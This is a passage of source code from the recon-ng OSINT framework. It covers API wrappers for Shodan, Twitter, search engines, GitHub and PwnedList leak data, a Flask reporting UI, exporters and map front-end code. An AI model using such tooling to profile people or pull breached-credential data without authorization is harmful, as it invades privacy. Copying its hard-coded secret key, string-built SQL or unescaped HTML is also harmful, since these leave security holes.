'http://localhost:%d' % (port) payload = {'response_type': 'code', 'client_id': client_id, 'scope': scope, 'state': self.get_random_str(40), 'redirect_uri': redirect_uri} authorize_url = '%s?%s' % (authorize_url, urllib.urlencode(payload)) w = webbrowser.get() w.open(authorize_url) # open a socket to receive the access token callback sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(('127.0.0.1', port)) sock.listen(1) conn, addr = sock.accept() data = conn.recv(1024) conn.sendall('HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><head><title>Recon-ngResponse received. Return to Recon-ng.') conn.close() # process the received data if 'error_description' in data: self.error(urllib.unquote_plus(re.search('error_description=([^\s&]*)', data).group(1))) return None authorization_code = re.search('code=([^\s&]*)', data).group(1) payload = {'grant_type': 'authorization_code', 'code': authorization_code, 'redirect_uri': redirect_uri, 'client_id': client_id, 'client_secret': client_secret} resp = self.request(access_url, method='POST', payload=payload) if 'error' in resp.json: self.error(resp.json['error_description']) return None access_token = resp.json['access_token'] self.add_key(token_name, access_token) return access_token def get_twitter_oauth_token(self): token_name = 'twitter_token' token = self.get_key(token_name) if token: return token twitter_key = self.get_key('twitter_api') twitter_secret = self.get_key('twitter_secret') url = 'https://api.twitter.com/oauth2/token' auth = (twitter_key, twitter_secret) headers = {'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'} payload = {'grant_type': 'client_credentials'} resp = self.request(url, method='POST', auth=auth, headers=headers, payload=payload) if 'errors' in resp.json: raise framework.FrameworkException('%s, %s' % (resp.json['errors'][0]['message'], resp.json['errors'][0]['label'])) access_token = resp.json['access_token'] self.add_key(token_name, access_token) return access_token def build_pwnedlist_payload(self, payload, method, key, secret): timestamp = int(time.time()) payload['ts'] = timestamp payload['key'] = key msg = '%s%s%s%s' % (key, timestamp, method, secret) hm = hmac.new(secret.encode('utf-8'), msg, hashlib.sha1) payload['hmac'] = hm.hexdigest() return payload def get_pwnedlist_leak(self, leak_id): # check if the leak has already been retrieved leak = self.query('SELECT * FROM leaks WHERE leak_id=?', (leak_id,)) if leak: leak = dict(zip([x[0] for x in self.get_columns('leaks')], leak[0])) del leak['module'] return leak # set up the API call key = self.get_key('pwnedlist_api') secret = self.get_key('pwnedlist_secret') url = 'https://api.pwnedlist.com/api/1/leaks/info' base_payload = {'leakId': leak_id} payload = self.build_pwnedlist_payload(base_payload, 'leaks.info', key, secret) # make the request resp = self.request(url, payload=payload) if resp.status_code != 200: self.error('Error retrieving leak data.\n%s' % (resp.text)) return leak = resp.json['leaks'][0] # normalize the leak for storage normalized_leak = {} for item in leak: value = leak[item] if type(value) == list: value = ', '.join(value) normalized_leak[item] = value return normalized_leak def search_twitter_api(self, payload, limit=False): headers = {'Authorization': 'Bearer %s' % (self.get_twitter_oauth_token())} url = 'https://api.twitter.com/1.1/search/tweets.json' results = [] while True: resp = self.request(url, payload=payload, headers=headers) if limit: # app auth rate limit for search/tweets is 450/15min time.sleep(2) jsonobj = resp.json for item in ['error', 'errors']: if item in jsonobj: raise framework.FrameworkException(jsonobj[item]) results += jsonobj['statuses'] if 'next_results' in jsonobj['search_metadata']: max_id = urlparse.parse_qs(jsonobj['search_metadata']['next_results'][1:])['max_id'][0] payload['max_id'] = max_id continue break return results def search_shodan_api(self, query, limit=0): api_key = self.get_key('shodan_api') url = 'https://api.shodan.io/shodan/host/search' payload = {'query': query, 'key': api_key} results = [] cnt = 0 page = 1 self.verbose('Searching Shodan API for: %s' % (query)) while True: resp = self.request(url, payload=payload) if resp.json == None: raise framework.FrameworkException('Invalid JSON response.\n%s' % (resp.text)) if 'error' in resp.json: raise framework.FrameworkException(resp.json['error']) if not resp.json['matches']: break # add new results results.extend(resp.json['matches']) # increment and check the limit cnt += 1 if limit == cnt: break # next page page += 1 payload['page'] = page return results def search_bing_api(self, query, limit=0): url = 'https://api.cognitive.microsoft.com/bing/v5.0/search' payload = {'q': query, 'count': 50, 'offset': 0, 'responseFilter': 'WebPages'} headers = {'Ocp-Apim-Subscription-Key': self.get_key('bing_api')} results = [] cnt = 0 self.verbose('Searching Bing API for: %s' % (query)) while True: resp = self.request(url, payload=payload, headers=headers) if resp.json == None: raise framework.FrameworkException('Invalid JSON response.\n%s' % (resp.text)) #elif 'error' in resp.json: elif resp.status_code == 401: raise framework.FrameworkException('%s: %s' % (resp.json['statusCode'], resp.json['message'])) # add new results, or if there's no more, return what we have... if 'webPages' in resp.json: results.extend(resp.json['webPages']['value']) else: return results # increment and check the limit cnt += 1 if limit == cnt: break # check for more pages # https://msdn.microsoft.com/en-us/library/dn760787.aspx if payload['offset'] > (resp.json['webPages']['totalEstimatedMatches'] - payload['count']): break # set the payload for the next request payload['offset'] += payload['count'] return results def search_google_api(self, query, limit=0): api_key = self.get_key('google_api') cse_id = self.get_key('google_cse') url = 'https://www.googleapis.com/customsearch/v1' payload = {'alt': 'json', 'prettyPrint': 'false', 'key': api_key, 'cx': cse_id, 'q': query} results = [] cnt = 0 self.verbose('Searching Google API for: %s' % (query)) while True: resp = self.request(url, payload=payload) if resp.json == None: raise framework.FrameworkException('Invalid JSON response.\n%s' % (resp.text)) # add new results if 'items' in resp.json: results.extend(resp.json['items']) # increment and check the limit cnt += 1 if limit == cnt: break # check for more pages if not 'nextPage' in resp.json['queries']: break payload['start'] = resp.json['queries']['nextPage'][0]['startIndex'] return results def search_github_api(self, query): self.verbose('Searching Github for: %s' % (query)) results = self.query_github_api(endpoint='/search/code', payload={'q': query}) # reduce the nested lists of search results and return results = [result['items'] for result in results] return [x for sublist in results for x in sublist] def query_github_api(self, endpoint, payload={}, options={}): opts = {'max_pages': None} opts.update(options) headers = {'Authorization': 'token %s' % (self.get_key('github_api'))} base_url = 'https://api.github.com' url = base_url + endpoint results = [] page = 1 while True: # Github rate limit is 30 requests per minute time.sleep(2) # 60s / 30r = 2s/r payload['page'] = page resp = self.request(url=url, headers=headers, payload=payload) # check for errors if resp.status_code != 200: # skip 404s returned for no results if resp.status_code != 404: self.error('Message from Github: %s' % (resp.json['message'])) break # some APIs return lists, and others a single dictionary method = 'extend' if type(resp.json) == dict: method = 'append' getattr(results, method)(resp.json) # paginate if 'link' in resp.headers and 'rel="next"' in resp.headers['link'] and (opts['max_pages'] is None or page < opts['max_pages']): page += 1 continue break return results #================================================== # REQUEST METHODS #================================================== def make_cookie(self, name, value, domain, path='/'): return cookielib.Cookie( version=0, name=name, value=value, port=None, port_specified=False, domain=domain, domain_specified=True, domain_initial_dot=False, path=path, path_specified=True, secure=False, expires=None, discard=False, comment=None, comment_url=None, rest=None ) #================================================== # SHOW METHODS #================================================== def show_inputs(self): if hasattr(self, '_default_source'): try: self._validate_options() inputs = self._get_source(self.options['source'], self._default_source) self.table([[x] for x in inputs], header=['Module Inputs']) except Exception as e: self.output(e.__str__()) else: self.output('Source option not available for this module.') def show_source(self): for path in [os.path.join(x, 'modules', self._modulename) +'.py' for x in (self.app_path, self._home)]: if os.path.exists(path): filename = path with open(filename) as f: content = f.readlines() nums = [str(x) for x in range(1, len(content)+1)] num_len = len(max(nums, key=len)) for num in nums: print('%s|%s' % (num.rjust(num_len), content[int(num)-1]), end='') def show_info(self): self.meta['path'] = os.path.join('modules', self._modulename) + '.py' print('') # meta info for item in ['name', 'path', 'author', 'version']: if self.meta.get(item): print('%s: %s' % (item.title().rjust(10), self.meta[item])) # required keys if self.meta.get('required_keys'): print('%s: %s' % ('keys'.title().rjust(10), ', '.join(self.meta.get('required_keys')))) print('') # description if 'description' in self.meta: print('Description:') print('%s%s' % (self.spacer, textwrap.fill(self.meta['description'], 100, subsequent_indent=self.spacer))) print('') # options print('Options:', end='') self.show_options() # sources if hasattr(self, '_default_source'): print('Source Options:') print('%s%s%s' % (self.spacer, 'default'.ljust(15), self._default_source)) print('%s%sstring representing a single input' % (self.spacer, ''.ljust(15))) print('%s%spath to a file containing a list of inputs' % (self.spacer, ''.ljust(15))) print('%s%sdatabase query returning one column of inputs' % (self.spacer, 'query '.ljust(15))) print('') # comments if 'comments' in self.meta: print('Comments:') for comment in self.meta['comments']: prefix = '* ' if comment.startswith('\t'): prefix = self.spacer+'- ' comment = comment[1:] print('%s%s' % (self.spacer, textwrap.fill(prefix+comment, 100, subsequent_indent=self.spacer))) print('') def show_globals(self): self.show_options(self._global_options) #================================================== # COMMAND METHODS #================================================== def do_reload(self, params): '''Reloads the current module''' self._reload = 1 return True def do_run(self, params): '''Runs the module''' try: self._summary_counts = {} self._validate_options() pre = self.module_pre() params = [pre] if pre is not None else [] # provide input if a default query is specified in the module if hasattr(self, '_default_source'): objs = self._get_source(self.options['source'], self._default_source) params.insert(0, objs) self.module_run(*params) self.module_post() except KeyboardInterrupt: print('') except Exception: self.print_exception() finally: # print module summary if self._summary_counts: self.heading('Summary', level=0) for table in self._summary_counts: new = self._summary_counts[table][0] cnt = self._summary_counts[table][1] if new > 0: method = getattr(self, 'alert') else: method = getattr(self, 'output') method('%d total (%d new) %s found.' % (cnt, new, table)) self._summary_counts = {} # update the dashboard self.query('INSERT OR REPLACE INTO dashboard (module, runs) VALUES (\'%(x)s\', COALESCE((SELECT runs FROM dashboard WHERE module=\'%(x)s\')+1, 1))' % {'x': self._modulename}) def module_pre(self): pass def module_run(self): pass def module_post(self): pass LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/000077500000000000000000000000001312265724400207675ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/__init__.py000066400000000000000000000011521312265724400230770ustar00rootroot00000000000000from flask import Flask import os # print welcome message welcome = '''\ ************************************************************************* * Welcome to Recon-web, the analytics and reporting engine for Recon-ng! * This is a web-based user interface. Open the following URL in your browser to begin.''' print welcome # configuration DEBUG = False SECRET_KEY = 'we keep no secrets here.' HOME_DIR = os.path.join(os.path.expanduser('~'), '.recon-ng') DATABASE = os.path.join(HOME_DIR, 'workspaces', '{}', 'data.db') JSON_SORT_KEYS = False app = Flask(__name__) app.config.from_object(__name__) import views LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/exports.py000066400000000000000000000061051312265724400230470ustar00rootroot00000000000000from dicttoxml import dicttoxml from flask import Response, send_file from io import BytesIO from recon.core.web.utils import add_worksheet, debug, is_url, StringIO from recon.utils import requests import os import unicodecsv as csv import xlsxwriter def csvify(rows): '''Expects a list of dictionaries and returns a CSV response.''' if not rows: csv_str = '' else: s = BytesIO() keys = rows[0].keys() dw = csv.DictWriter(s, keys) dw.writeheader() dw.writerows([dict(r) for r in rows]) csv_str = s.getvalue() return Response(csv_str, mimetype='text/csv') def xmlify(rows): '''Expects a list of dictionaries and returns a XML response.''' xml = dicttoxml(rows) return Response(xml, mimetype='text/xml') def listify(rows): '''Expects a list of dictionaries and returns a continous list of values from all of the provided columns.''' columns = {} for row in rows: for column in row.keys(): if column not in columns: columns[column] = [] columns[column].append(row[column]) s = StringIO() for column in columns: s.write(u'# '+column+os.linesep) for value in columns[column]: if type(value) != unicode: value = unicode(value) s.write(value+os.linesep) list_str = s.getvalue() return Response(list_str, mimetype='text/plain') def xlsxify(rows): '''Expects a list of dictionaries and returns an xlsx response.''' sfp = StringIO() with xlsxwriter.Workbook(sfp) as workbook: # create a single worksheet for the provided rows add_worksheet(workbook, 'worksheet', rows) sfp.seek(0) return send_file(sfp, mimetype='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet') # http://flask.pocoo.org/docs/0.12/patterns/streaming/ def proxify(rows): def generate(): '''Expects a list of dictionaries containing URLs and requests them through a configured proxy.''' # don't bother setting up if there's nothing to process if not rows: yield 'Nothing to send to proxy.' # build the request object req = requests.Request( user_agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36', proxy='127.0.0.1:8080', redirect=False, ) # process the rows for row in rows: for key in row: url = unicode(row[key]) msg = 'URL: '+url+os.linesep+'Status: ' if is_url(url): try: resp = req.send(url) msg += 'HTTP {}: Successfully proxied.'.format(resp.status_code) except Exception as e: msg += str(e) else: msg += 'Error: Failed URL validation.' msg += os.linesep*2 debug(msg.strip()) yield msg return Response(generate(), mimetype='text/plain') LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/reports.py000066400000000000000000000013241312265724400230370ustar00rootroot00000000000000from flask import render_template, send_file from recon.core.web.utils import add_worksheet, get_tables, query, StringIO import xlsxwriter def xlsx(): '''Returns an xlsx file containing the entire dataset for the current workspace.''' sfp = StringIO() with xlsxwriter.Workbook(sfp) as workbook: # create a worksheet for each table in the current workspace for table in [t['name'] for t in get_tables()]: rows = query('SELECT * FROM {}'.format(table)) add_worksheet(workbook, table, rows) sfp.seek(0) return send_file(sfp, mimetype='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet') def pushpin(): return render_template('pushpin.html') LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/static/000077500000000000000000000000001312265724400222565ustar00rootroot00000000000000LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/static/normalize.css000066400000000000000000000171651312265724400250020ustar00rootroot00000000000000/*! normalize.css v3.0.2 | MIT License | git.io/normalize */ /** * 1. Set default font family to sans-serif. * 2. Prevent iOS text size adjust after orientation change, without disabling * user zoom. */ html { font-family: sans-serif; /* 1 */ -ms-text-size-adjust: 100%; /* 2 */ -webkit-text-size-adjust: 100%; /* 2 */ } /** * Remove default margin. */ body { margin: 0; } /* HTML5 display definitions ========================================================================== */ /** * Correct `block` display not defined for any HTML5 element in IE 8/9. * Correct `block` display not defined for `details` or `summary` in IE 10/11 * and Firefox. * Correct `block` display not defined for `main` in IE 11. */ article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary { display: block; } /** * 1. Correct `inline-block` display not defined in IE 8/9. * 2. Normalize vertical alignment of `progress` in Chrome, Firefox, and Opera. */ audio, canvas, progress, video { display: inline-block; /* 1 */ vertical-align: baseline; /* 2 */ } /** * Prevent modern browsers from displaying `audio` without controls. * Remove excess height in iOS 5 devices. */ audio:not([controls]) { display: none; height: 0; } /** * Address `[hidden]` styling not present in IE 8/9/10. * Hide the `template` element in IE 8/9/11, Safari, and Firefox < 22. */ [hidden], template { display: none; } /* Links ========================================================================== */ /** * Remove the gray background color from active links in IE 10. */ a { background-color: transparent; } /** * Improve readability when focused and also mouse hovered in all browsers. */ a:active, a:hover { outline: 0; } /* Text-level semantics ========================================================================== */ /** * Address styling not present in IE 8/9/10/11, Safari, and Chrome. */ abbr[title] { border-bottom: 1px dotted; } /** * Address style set to `bolder` in Firefox 4+, Safari, and Chrome. */ b, strong { font-weight: bold; } /** * Address styling not present in Safari and Chrome. */ dfn { font-style: italic; } /** * Address variable `h1` font-size and margin within `section` and `article` * contexts in Firefox 4+, Safari, and Chrome. */ h1 { font-size: 2em; margin: 0.67em 0; } /** * Address styling not present in IE 8/9. */ mark { background: #ff0; color: #000; } /** * Address inconsistent and variable font size in all browsers. */ small { font-size: 80%; } /** * Prevent `sub` and `sup` affecting `line-height` in all browsers. */ sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; } sup { top: -0.5em; } sub { bottom: -0.25em; } /* Embedded content ========================================================================== */ /** * Remove border when inside `a` element in IE 8/9/10. */ img { border: 0; } /** * Correct overflow not hidden in IE 9/10/11. */ svg:not(:root) { overflow: hidden; } /* Grouping content ========================================================================== */ /** * Address margin not present in IE 8/9 and Safari. */ figure { margin: 1em 40px; } /** * Address differences between Firefox and other browsers. */ hr { -moz-box-sizing: content-box; box-sizing: content-box; height: 0; } /** * Contain overflow in all browsers. */ pre { overflow: auto; } /** * Address odd `em`-unit font size rendering in all browsers. */ code, kbd, pre, samp { font-family: monospace, monospace; font-size: 1em; } /* Forms ========================================================================== */ /** * Known limitation: by default, Chrome and Safari on OS X allow very limited * styling of `select`, unless a `border` property is set. */ /** * 1. Correct color not being inherited. * Known issue: affects color of disabled elements. * 2. Correct font properties not being inherited. * 3. Address margins set differently in Firefox 4+, Safari, and Chrome. */ button, input, optgroup, select, textarea { color: inherit; /* 1 */ font: inherit; /* 2 */ margin: 0; /* 3 */ } /** * Address `overflow` set to `hidden` in IE 8/9/10/11. */ button { overflow: visible; } /** * Address inconsistent `text-transform` inheritance for `button` and `select`. * All other form control elements do not inherit `text-transform` values. * Correct `button` style inheritance in Firefox, IE 8/9/10/11, and Opera. * Correct `select` style inheritance in Firefox. */ button, select { text-transform: none; } /** * 1. Avoid the WebKit bug in Android 4.0.* where (2) destroys native `audio` * and `video` controls. * 2. Correct inability to style clickable `input` types in iOS. * 3. Improve usability and consistency of cursor style between image-type * `input` and others. */ button, html input[type="button"], /* 1 */ input[type="reset"], input[type="submit"] { -webkit-appearance: button; /* 2 */ cursor: pointer; /* 3 */ } /** * Re-set default cursor for disabled elements. */ button[disabled], html input[disabled] { cursor: default; } /** * Remove inner padding and border in Firefox 4+. */ button::-moz-focus-inner, input::-moz-focus-inner { border: 0; padding: 0; } /** * Address Firefox 4+ setting `line-height` on `input` using `!important` in * the UA stylesheet. */ input { line-height: normal; } /** * It's recommended that you don't attempt to style these elements. * Firefox's implementation doesn't respect box-sizing, padding, or width. * * 1. Address box sizing set to `content-box` in IE 8/9/10. * 2. Remove excess padding in IE 8/9/10. */ input[type="checkbox"], input[type="radio"] { box-sizing: border-box; /* 1 */ padding: 0; /* 2 */ } /** * Fix the cursor style for Chrome's increment/decrement buttons. For certain * `font-size` values of the `input`, it causes the cursor style of the * decrement button to change from `default` to `text`. */ input[type="number"]::-webkit-inner-spin-button, input[type="number"]::-webkit-outer-spin-button { height: auto; } /** * 1. Address `appearance` set to `searchfield` in Safari and Chrome. * 2. Address `box-sizing` set to `border-box` in Safari and Chrome * (include `-moz` to future-proof). */ input[type="search"] { -webkit-appearance: textfield; /* 1 */ -moz-box-sizing: content-box; -webkit-box-sizing: content-box; /* 2 */ box-sizing: content-box; } /** * Remove inner padding and search cancel button in Safari and Chrome on OS X. * Safari (but not Chrome) clips the cancel button when the search input has * padding (and `textfield` appearance). */ input[type="search"]::-webkit-search-cancel-button, input[type="search"]::-webkit-search-decoration { -webkit-appearance: none; } /** * Define consistent border, margin, and padding. */ fieldset { border: 1px solid #c0c0c0; margin: 0 2px; padding: 0.35em 0.625em 0.75em; } /** * 1. Correct `color` not being inherited in IE 8/9/10/11. * 2. Remove padding so people aren't caught out if they zero out fieldsets. */ legend { border: 0; /* 1 */ padding: 0; /* 2 */ } /** * Remove default vertical scrollbar in IE 8/9/10/11. */ textarea { overflow: auto; } /** * Don't inherit the `font-weight` (applied by a rule above). * NOTE: the default cannot safely be changed in Chrome and Safari on OS X. */ optgroup { font-weight: bold; } /* Tables ========================================================================== */ /** * Remove most spacing between table cells. */ table { border-collapse: collapse; border-spacing: 0; } td, th { padding: 0; }LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/static/pushpin.css000066400000000000000000000023721312265724400244620ustar00rootroot00000000000000html { height: 100%; } body { height: 100%; margin: 0; padding: 0; } .map { width: 100%; height: 100%; -webkit-border-radius: 0px; -moz-border-radius: 0px; border-radius: 0px; } .toolbar { color: white; position: absolute; top: 2rem; left: 2rem; z-index: 99; padding: .5rem; border: 2px solid #f69741; /* Fallback for web browsers that doesn't support RGBa */ background: rgb(0, 0, 0); /* RGBa opacity */ background: rgba(0, 0, 0, 0.6); } .toolbar .header { font-size: 2rem; } .filter { border-top: 2px solid #f69741; padding: 0 .5rem; } .filter input { margin: 0; } .iw-content { max-width: 300px; margin-bottom: 0; } .iw-content caption { background-color: #f69741; color: white; font-size: 2.5rem; font-weight: 400; } .iw-content td { padding-top: 0; padding-bottom: 0; } .iw-content a { text-decoration: none; } .iw-content img { width: 100%; margin: .5rem 0; } .rounded { -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; } .shaded { border: 1px solid orange; -webkit-box-shadow: 3px 3px 3px gray; -moz-box-shadow: 3px 3px 3px gray; box-shadow: 3px 3px 3px gray; } LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/static/pushpin.js000066400000000000000000000106161312265724400243060ustar00rootroot00000000000000var map var bounds var icons = { default: 'ffffff', flickr: 'ff8000', instagram: 'ffc0cb', picasa: '984c99', shodan: 'ffff00', twitter: '32cdff', youtube: 'e62117', } function load_map() { var coords = new google.maps.LatLng(0,0); var mapOptions = { zoom: 5, center: coords, mapTypeId: google.maps.MapTypeId.ROADMAP, disableDefaultUI: true, mapTypeControl: true, mapTypeControlOptions: { style: google.maps.MapTypeControlStyle.DROPDOWN_MENU, position: google.maps.ControlPosition.RIGHT_TOP }, panControl: true, panControlOptions: { position: google.maps.ControlPosition.RIGHT_BOTTOM }, streetViewControl: true, streetViewControlOptions: { position: google.maps.ControlPosition.RIGHT_BOTTOM }, zoomControl: true, zoomControlOptions: { position: google.maps.ControlPosition.RIGHT_BOTTOM }, }; map = new google.maps.Map(document.getElementById("map"), mapOptions); bounds = new google.maps.LatLngBounds(); } function add_marker(opts, place, pushpin) { var marker = new google.maps.Marker(opts); var infowindow = new google.maps.InfoWindow({ autoScroll: false, content: place.details }); google.maps.event.addListener(marker, 'click', function() { infowindow.open(map, marker); }); // add the pushpin data to its marker object marker.pushpin = pushpin; window['markers'].push(marker); bounds.extend(opts.position); return marker; } function load_markers(json) { var sources = []; for (var i = 0; i < json['rows'].length; i++) { pushpin = json['rows'][i]; // add the marker to the map var color = icons[pushpin.source.toLowerCase()] || icons['default']; var marker = add_marker({ position: new google.maps.LatLng(pushpin.latitude, pushpin.longitude), title: pushpin.profile_name, icon: 'http://chart.apis.google.com/chart?chst=d_map_pin_letter&chld=%E2%80%A2|'+color, map: map, },{ details:'' + '' + '' + '' + '' + '' + '
'+pushpin.profile_name+'
Handle'+pushpin.screen_name+'
Message'+pushpin.message+'
Time'+pushpin.time+'
' }, pushpin ); // add filter checkboxes for each unique source if (sources.indexOf(pushpin.source) === -1) { var checkbox = document.createElement('input'); checkbox.type = 'checkbox'; checkbox.name = 'source'; checkbox.value = pushpin.source; checkbox.setAttribute('checked', 'checked'); checkbox.checked = true; checkbox.addEventListener('change', function(e) { toggle_marker(e.target); }); var filter = document.getElementById('filter-source'); filter.appendChild(checkbox); filter.appendChild(document.createTextNode(' '+pushpin.source)); filter.appendChild(document.createElement('br')); sources.push(pushpin.source); } } map.fitBounds(bounds); } // set the map on all markers in the array function toggle_marker(element) { _map = null; if(element.checked) { _map = map; } for (var i = 0; i < window['markers'].length; i++) { if (window['markers'][i].pushpin[element.name] === element.value) { window['markers'][i].setMap(_map); } } } $(document).ready(function() { // load the map load_map(); // build the url var url = "/api/workspaces/"+workspace+"/tables/pushpins"; // load the pushpins $.ajax({ type: "GET", url: url, success: function(data) { // declare a storage array for markers window['markers'] = []; load_markers(data); console.log("Markers loaded successfully."); }, error: function(error) { console.log(error); } }); }); LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/static/recon.css000066400000000000000000000103171312265724400241000ustar00rootroot00000000000000body { font-family: 'Open Sans', sans-serif; } /* unvisited link */ a:link { color: inherit; } /* visited link */ a:visited { color: inherit; } /* mouse over link */ a:hover { color: inherit; } /* selected link */ a:active { color: inherit; } #nav { /* made visible on load after size adjustments */ visibility: hidden; } .nav { display: table; width: 100%; margin-top: .5rem; font-size: 3rem; text-align: left; } .nav #nav { line-height: 38px; } .nav #reports { font-size: 1.5rem; } .nav a { text-decoration: inherit; } .nav select { color: #f69741; background: transparent; border: none; -webkit-appearance: none; -moz-appearance: none; appearance: none; padding: 0; margin: 0 -0.5rem; font-size: 2rem; cursor: pointer; } .nav #template { visibility: hidden; position: absolute; top: -200px; } .tooltip { position: relative; } .tooltip .tooltiptext { visibility: hidden; background-color: #222; color: #fff; text-align: center; padding: 0 .5rem; border-radius: .5rem; position: fixed; z-index: 1; } .tooltip:hover .tooltiptext { visibility: visible; } .tooltip .tooltiptext::after { content: " "; position: absolute; top: 100%; /* at the bottom of the tooltip */ left: 50%; margin-left: -.5rem; border-width: .5rem; border-style: solid; border-color: black transparent transparent transparent; } .db-tables { overflow: auto; margin: .5rem 0; } .db-tables .label { float: left; margin: .5rem; } .button-list { list-style-type: none; margin: 0; padding: 0; } .button-list li { float: left; margin: .5rem; padding: 0; border: 1px solid #ccc; background-color: #f1f1f1; } .button-list li a { margin: 0; padding: .5rem; text-align: center; font-weight: bolder; text-decoration: none; } .button-list li:hover { background-color: #ddd; } .summary { text-align: center; margin-top: .5rem; } .summary.left, .summary.right { overflow: auto; padding-top: 2rem; padding-bottom: 2rem; } .summary.left { } .summary.left .name { font-size: 3rem; text-decoration: underline; } .summary.left .count { font-size: 5rem; font-weight: bolder; } .summary.right { } .summary.right .module { font-size: 2rem; text-decoration: underline; } .summary.right .runs { font-size: 3rem; font-weight: bolder; } .ck-button { float: left; margin: .5rem; padding: 0; border: 1px solid #ccc; background-color: #f1f1f1; overflow: hidden; } .ck-button label { float: left; margin: 0; padding: 0; } .ck-button label span { text-align: center; padding: .5rem; cursor: pointer; } .ck-button label input { position: absolute; top: -20px; } .ck-button label input:checked + span { background-color: #ddd; } .ck-filter { color: white; background-color: #f69741; border-color: #bbb; } .ck-filter label input:hover + span { background-color: #f4821c; border-color: 0; } .db-table { overflow: auto; margin: .5rem 0; padding: 0 1rem; height: 100vh; } #sorttable th { cursor: pointer; } .active { background-color: #ddd !important; } .no-select { -webkit-user-select: none; /* Chrome all / Safari all */ -webkit-touch-callout: none; /* iOS Safari */ -khtml-user-select: none; /* Konqueror */ -moz-user-select: none; /* Firefox all */ -ms-user-select: none; /* IE 10+ */ user-select: none; /* Common (limited support) */ } .pulsate { -webkit-animation: pulsate 3s ease-out; -webkit-animation-iteration-count: infinite; font-size: 2rem; } @-webkit-keyframes pulsate { 0% { opacity: 0.1; } 50% { opacity: 1.0; } 100% { opacity: 0.1; } } .outlined { border: 1px solid #ccc; } .center { margin-left: auto; margin-right: auto; } .center-content { text-align: center; } .cell { display: table-cell !important; vertical-align: middle; } .content-left { float: left; } .content-right { float: right; } #reports, #summary, #tables, #columns, #exports, #data { display: none; } LaNMaSteR53-recon-ng-70d967e3f530/recon/core/web/static/recon.js000066400000000000000000000210431312265724400237220ustar00rootroot00000000000000$("#workspace").change(function(){ // reset the view $("#reports").hide(); $("#tables").hide(); $("#summary").hide(); $("#columns").hide(); $("#exports").hide(); $("#data").hide(); // get the data from the api var workspace = $("#workspace option:selected").text(); var url = "/api/workspaces/"+workspace; $.get(url, function(data, status){ // create the workspace createWorkspace(data.tables); // create the summary createSummary(data.summary); // create the reports options createReports(data.reports); }); // show the new elements on screen $("#reports").show(); $("#tables").show(); $("#summary").show(); // set the width of the workspace select box setSelectWidth($(this)); // set the height of the summary panels setFillHeight(); }); $("#reports-list").on("click", "li", function(e) { // get the current workspace var workspace = $("#workspace option:selected").text(); // get the report name var report = $(e.target).text(); // build the url var url = "/api/workspaces/"+workspace+"."+report; // open in a new tab window.open(url, '_blank'); // prevent the checked state e.preventDefault(); e.stopPropagation(); }); $("#tables-list").on("click", "li", function() { // reset the previously selected table style $("#tables-list > li").each(function (i, e) { $(e).removeClass("active"); }); $(this).addClass("active"); // get the data from the api var workspace = $("#workspace option:selected").text(); var table = $(this).text(); var url = "/api/workspaces/"+workspace+"/tables/"+table; $.get(url, function(data, status) { // create the column filter createColumnFilter(data.columns); // create the export menu createExportMenu(data.exports); // create the data table createDataTable(data.rows); }); // show the new elements on screen $("#summary").hide(); $("#columns").show(); $("#exports").show(); $("#data").show(); }); $("#columns-list").on("click", "#filter", function (e) { // build the columns parameter value var checked = []; $("input[name='column']:checked").each(function() { checked.push($(this).val()); }); var checkedStr = checked.join(); // get the current workspace var workspace = $("#workspace option:selected").text(); // get the current table var table = ""; $("#tables-list > li").each(function (i, e) { if ($(e).hasClass("active")) { table = $(e).find('a').text(); } }); // build the url var url = "/api/workspaces/"+workspace+"/tables/"+table+"?columns="+checkedStr; // get the data from the api $.get(url, function(data, status) { // create the data table createDataTable(data.rows); }); // show the new elements on screen $("#data").show(); // prevent the checked state e.preventDefault(); e.stopPropagation(); }); $("#exports-list").on("click", "li", function(e) { // build the columns parameter value var checked = []; $("input[name='column']:checked").each(function() { checked.push($(this).val()); }); var checkedStr = checked.join(); // get the current workspace var workspace = $("#workspace option:selected").text(); // get the current table var table = ""; $("#tables-list > li").each(function (i, e) { if ($(e).hasClass("active")) { table = $(e).find('a').text(); } }); // get the desired format var format = $(this).text(); // build the url var url = "/api/workspaces/"+workspace+"/tables/"+table+"."+format+"?columns="+checkedStr; // open in a new tab to download the file window.open(url, '_blank'); // prevent the checked state e.preventDefault(); e.stopPropagation(); }); function createWorkspace(tables) { // clear existing elements $("#tables-list").empty(); // add DOM elements based on the provided table names $.each(tables, function(i) { var li = $("
  • ").appendTo($("#tables-list")); var a = $("").attr("href", "javascript:void(0)").text(tables[i].name).appendTo(li); }); } function createSummary(summary) { // clear existing elements $("#summary-list-l").empty(); $("#summary-list-r").empty(); // add DOM elements to left panel based on the provided records $.each(summary.records, function(i) { var div1 = $("
    ").addClass("name").appendTo($("#summary-list-l")).text(summary.records[i].name); var div2 = $("
    ").addClass("count").appendTo($("#summary-list-l")).text(summary.records[i].count); }); // add DOM elements to right panel based on the provided modules if (summary.modules.length > 0) { $.each(summary.modules, function(i) { var div0 = $("
    ").appendTo($("#summary-list-r")) var div1 = $("
    ").addClass("module").appendTo(div0).text(summary.modules[i].module); var div2 = $("
    ").addClass("runs").appendTo(div0).text(summary.modules[i].runs); }); } else { $("#summary-list-r").append("
    No Data.
    "); } } function createReports(reports) { // clear existing elements $("#reports-list").empty(); // add DOM elements based on the provided report names $.each(reports, function(i) { var li = $("
